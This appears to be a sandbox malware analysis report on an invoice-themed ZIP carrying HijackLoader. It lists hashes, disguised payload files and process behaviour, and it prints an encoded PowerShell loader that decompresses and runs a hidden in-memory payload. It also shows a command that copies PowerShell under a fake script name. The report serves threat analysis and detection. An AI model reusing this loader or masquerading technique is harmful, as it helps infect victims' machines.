Analysis
-
max time kernel
96s -
max time network
146s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-10-2024 15:15
Static task
static1
Behavioral task
behavioral1
Sample
facturagm-27725407957355783426.zip
Resource
win11-20241007-en
General
-
Target
facturagm-27725407957355783426.zip
-
Size
49.2MB
-
MD5
79e9ed02ff9d617c1732776ff596f47a
-
SHA1
9e3dd3c140198fc5ff080dec7d610f5bb04d2e4a
-
SHA256
48fa854012e6abef23589909ec3293efc3df0ab2b5ef4406ccaf7ee0b68464c6
-
SHA512
7b418b82b6f8b7fb165ee2ca3a014ce94bd229a10d11fc141be8dea47a728e04670cfa795757d0ea6bf127db13952c4e4b1bc4ec3f25f623a5f108734b76d241
-
SSDEEP
1572864:4ltjOLVis6A90iwyhwLmWaBOZF+QLr45/rby0:4ltjORX9VnqaBOj96/Xy0
Malware Config
Signatures
-
Detects HijackLoader (aka IDAT Loader) 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\app.asar.unpacked\chronicle.svg family_hijackloader C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\cardigan.mpeg family_hijackloader C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\toparch.svg family_hijackloader -
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4548 276 cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
facturagm-27725407957355783426.vbs.exepid process 2840 facturagm-27725407957355783426.vbs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
facturagm-27725407957355783426.vbs.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language facturagm-27725407957355783426.vbs.exe -
Modifies registry class 1 IoCs
Processes:
WScript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ WScript.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
facturagm-27725407957355783426.vbs.exepid process 2840 facturagm-27725407957355783426.vbs.exe 2840 facturagm-27725407957355783426.vbs.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
7zG.exefacturagm-27725407957355783426.vbs.exedescription pid process Token: SeRestorePrivilege 416 7zG.exe Token: 35 416 7zG.exe Token: SeSecurityPrivilege 416 7zG.exe Token: SeSecurityPrivilege 416 7zG.exe Token: SeDebugPrivilege 2840 facturagm-27725407957355783426.vbs.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
7zG.exepid process 416 7zG.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 3172 wrote to memory of 2840 3172 WScript.exe facturagm-27725407957355783426.vbs.exe PID 3172 wrote to memory of 2840 3172 WScript.exe facturagm-27725407957355783426.vbs.exe PID 3172 wrote to memory of 2840 3172 WScript.exe facturagm-27725407957355783426.vbs.exe
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426.zip1⤵PID:3796
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4820
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\" -spe -an -ai#7zMap2430:140:7zEvent58071⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:416
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe"C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe" -enc JABMAHcAZQBlAGcAagBqAGIAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABXAGsAZwBtAHcAawAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEwAdwBlAGUAZwBqAGoAYgBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBrAGcAbQB3AGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAFAAeAB6AHgAcgBrAGYAcQBiAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAApADsAJABLAGwAawBwAHUAZQBwAGMAZgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQARwBhAGkAdQBsACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFAAeAB6AHgAcgBrAGYAcQBiAG4ALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAYQBpAHUAbAAuAEMAbwBwAHkAVABvACgAIAAkAEsAbABrAHAAdQBlAHAAYwBmACAAKQA7ACQARwBhAGkAdQBsAC4AQwBsAG8AcwBlACgAKQA7ACQAUAB4AHoAeAByAGsAZgBxAGIAbgAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAA9ACAAJABLAGwAawBwAHUAZQBwAGMAZgAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATQBoAGgAaABrAHoAZwBlAG4AdAApADsAIAAkAEcAdQB2AGoAZwBvAHAAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQATQBoAGgAaABrAHoAZwBlAG4AdAApADsAIAAkAE8AcABkAGQAawAgAD0AIAAkAEcAdQB2AGoAZwBvAHAALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABPAHAAZABkAGsALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAE8AcABkAGQAawAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
C:\Windows\system32\cmd.execmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe" /Y1⤵
- Process spawned unexpected child process
PID:4548
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Managed\hgfs.dll
Filesize89KB
MD5a3ffaec3fd51d8bbf4c5f1575100b856
SHA1a7dbe003681b48c6075cdae3d4ff2dcbeb51311f
SHA256ff63474af99de3c2558228551cf869f01d77f96617cd40ef965691b984b96002
SHA51212197073f3c6f3475efc3ea1bb32958e37803e4be9ed0199bfe65cdbd458a73d95037c03ce6894624abcd37618f36ab4e8614df1cbca799caa5f17808440f5f5
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\cardigan.mpeg
Filesize878KB
MD5dc93cc9611ad0f3955d945cb9fe49a2f
SHA14097a79a913448879ed22f79524fd0bc2fc4d542
SHA2565f258c49d628f1feae9a2e6c446f2ea785c329f86705a324e0d077e832132d88
SHA5127e84542818e10baafbd07b13ca99f1f183e871acd276a67cd9d09b3e99b7d57ab86590e8d005a8c623b6b4a79baf2be34e7977af3eed85a4e223dec78ec10fd5
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\glib-2.0.dll
Filesize1.0MB
MD52c86ec2ba23eb138528d70eef98e9aaf
SHA1246846a3fe46df492f0887a31f7d52aae4faa71a
SHA256030983470da06708cc55fd6aca92df199a051922b580db5db55c8cb6b203b51b
SHA512396a3883fa65d7c3a0af7d607001a6099316a85563147cb34fa9806c9a4b39cfa90c7fa9eb4456399977eb47438d10896d25ed5327ae7aa3e3ae28cd1d13701c
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\msvcr90.dll
Filesize638KB
MD511d49148a302de4104ded6a92b78b0ed
SHA1fd58a091b39ed52611ade20a782ef58ac33012af
SHA256ceb0947d898bc2a55a50f092f5ed3f7be64ac1cd4661022eefd3edd4029213b0
SHA512fdc43b3ee38f7beb2375c953a29db8bcf66b73b78ccc04b147e26108f3b650c0a431b276853bb8e08167d34a8cc9c6b7918daef9ebc0a4833b1534c5afac75e4
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\sqlite.dll
Filesize243KB
MD596ea9810b13ae107a3efbc44452f1ddf
SHA1e4db1816f5a16f1ff4b8b90453a875a9c3aed3ea
SHA256794a456a593e50ecdbdb1c08687d9db7724db2597889883e9a32ee11ba0166cd
SHA5120ff49e5112bd48eed297554f0d971ab07266564f6bcc80bfa7dbb66629579f4f8bb5509c4390714990e8c5d7dfea261a5626a117c3061c66424879b0b6ea69a2
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\toparch.svg
Filesize1.2MB
MD55b23b0752f582a7ea16296a9238a568a
SHA1aebd7767b37a28d5eaab02f4b5f7e982441f9269
SHA25696d8470b767bce6fbc71e55c2c43980da104f9532f941e25e30ae3c8fb7b63e6
SHA5125f7a7d287916ba99acfabd074576f7d2db585d594e202739d2cd492b679ba1899cdc27c7c744f8314f6cf030f6d9ca7a841e7fea68e00bee7757b353d0eca330
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\vcruntime140.dll
Filesize106KB
MD549c96cecda5c6c660a107d378fdfc3d4
SHA100149b7a66723e3f0310f139489fe172f818ca8e
SHA25669320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Resources\msvcp90.dll
Filesize557KB
MD590a32d8e07f7fb3d102eab1da28f0723
SHA10903911bbb5d00f68ba51895fa898b38a5453ded
SHA256004ed24507dc7307cec1a3732fa57eabf19e918c3e1b54561e6cc01f554c0b77
SHA5122c69586d5c5d2b4b5decf2bf479554c3d0ff5f5a6fbacb01b8583ea8d96d0ae9c850c30a0d43eb2ad1116be901578d15fe08fce3e505440c854082c208a79f1a
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Resources\vcruntime140_1.dll
Filesize48KB
MD5cf0a1c4776ffe23ada5e570fc36e39fe
SHA12050fadecc11550ad9bde0b542bcf87e19d37f1a
SHA2566fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47
SHA512d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\level4.resS
Filesize128KB
MD564d183ad524dfcd10a7c816fbca3333d
SHA15a180d5c1f42a0deaf475b7390755b3c0ecc951c
SHA2565a666340f42f0f985772024d90a83d15c9a241a68d58205cd4afbb1a31f1621a
SHA5123cab59dff09981f49d1070fba06a781439bb1ea2dae0cfcb937d9875bbe9e866be2c951cfc6a3ca4a92aea79dd3e9c4792a765f5a06f230a57dabcab2f0b3c1e
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\mozglue.dll
Filesize222KB
MD5536f3db0935e8a3e4a946cda6f641213
SHA10d59a21a15e3d7fdaed9549cae0d69b9bff3a1a3
SHA2563a8263b607897e6754604e08b62b088ab2443df57146dee8f709193c454cd573
SHA512016646f745d6ce3fa2e600dd3131805b7a0b1171fd5f59f53b9582128297c3a9bcd8ea20020fc1c2953f2cfe96b2e70d56a824b9e2bc2fc11422aec9243e66d4
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\app.asar.unpacked\chronicle.svg
Filesize901KB
MD5f5287c9ac6523fa9afc2096a5bcea901
SHA1d9f5b46a8525ef7e90e9446a3b750677e5018718
SHA256518bc674a4855d72a0163972be3e9776358dd2806e69ff5c846efc8424c4463d
SHA512450bf0347f5098279bdb3b1f76951039bf59884d96107541e37ef3b3d3dd52bb1d3cf54451f8209ee6be79096bf6282fa0479f492e7e2a6dfa93a3c296b76bd6
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\app.asar.unpacked\msvcp140.dll
Filesize564KB
MD51ba6d1cf0508775096f9e121a24e5863
SHA1df552810d779476610da3c8b956cc921ed6c91ae
SHA25674892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823
SHA5129887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\vmtools.dll
Filesize617KB
MD565c3c2a741838474a592679cda346753
SHA1043d80766dd4e49d8dca6ac72b04e09b5491fdc9
SHA2564e5f2c54d9ecfe48999edfcce0de038948f8b20ff68e299c55d9a2d6f65713e8
SHA512e5d8b308586ffa914f46b6766217eb12ad759853d25108db06170b870d0e8947e2befabc2843f76cb864b0f0135a8f2163b7c93fe644b293789919d1d07c4079
-
Filesize
1.6MB
MD5ef631a2d714c4ea5480e40163f23344f
SHA15a32baa3072836e76ea12006fb9a9d69ec10a6f3
SHA25643f335930a2bb9df1e30bd3e8e10cab5bc4cd23c31b2db740c9649596821b4f1
SHA51278c078d20091344c0efd0e740e1045454e3b261318c1eb9056f51ec82abec8a99b21194fb7a096d350ec23f76a1719501694d4b2bf5801903635d62c1cafe703
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe
Filesize411KB
MD5bc4535f575200446e698610c00e1483d
SHA178d990d776f078517696a2415375ac9ebdf5d49a
SHA25688e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122
SHA512a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717